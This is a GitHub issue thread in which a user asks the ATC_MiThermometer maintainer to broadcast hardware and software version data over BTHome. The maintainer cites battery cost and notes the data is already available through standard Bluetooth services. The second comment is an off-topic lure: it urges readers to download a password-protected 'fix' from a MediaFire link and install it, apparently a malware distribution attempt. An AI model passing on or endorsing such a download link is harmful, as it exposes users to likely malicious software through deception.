pvvx/ATC_MiThermometer #535: Feature Request: Hardware and Software Version output via BT Home

rossi75, 2024-08-27:
Hi all,

actually only the sensors like below are being submitted via BLE.
[image]

Is it possible to also to offer the hardware and software version of the device via a datapoint? Like with Tasmota:
[image]

When reading out via TElink flasher, those will be displayed, so they are available in any way...

praveenking945, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

pvvx, 2024-08-27:
Any additional data transfer requires energy. If you agree that the battery will work less time before replacement, then it is possible to include additional data in the transfer.
But what I need most is maximum battery life.
You can enable the transmission of additional information by adding it to the firmware source code.

pvvx, 2024-12-19:
Information about the version, hw type, name, serial number, and so on is located in typical Bluetooth services and the thermometer provides it. 
If you need them, then contact Home Assistant.

closed 2024-12-19 by pvvx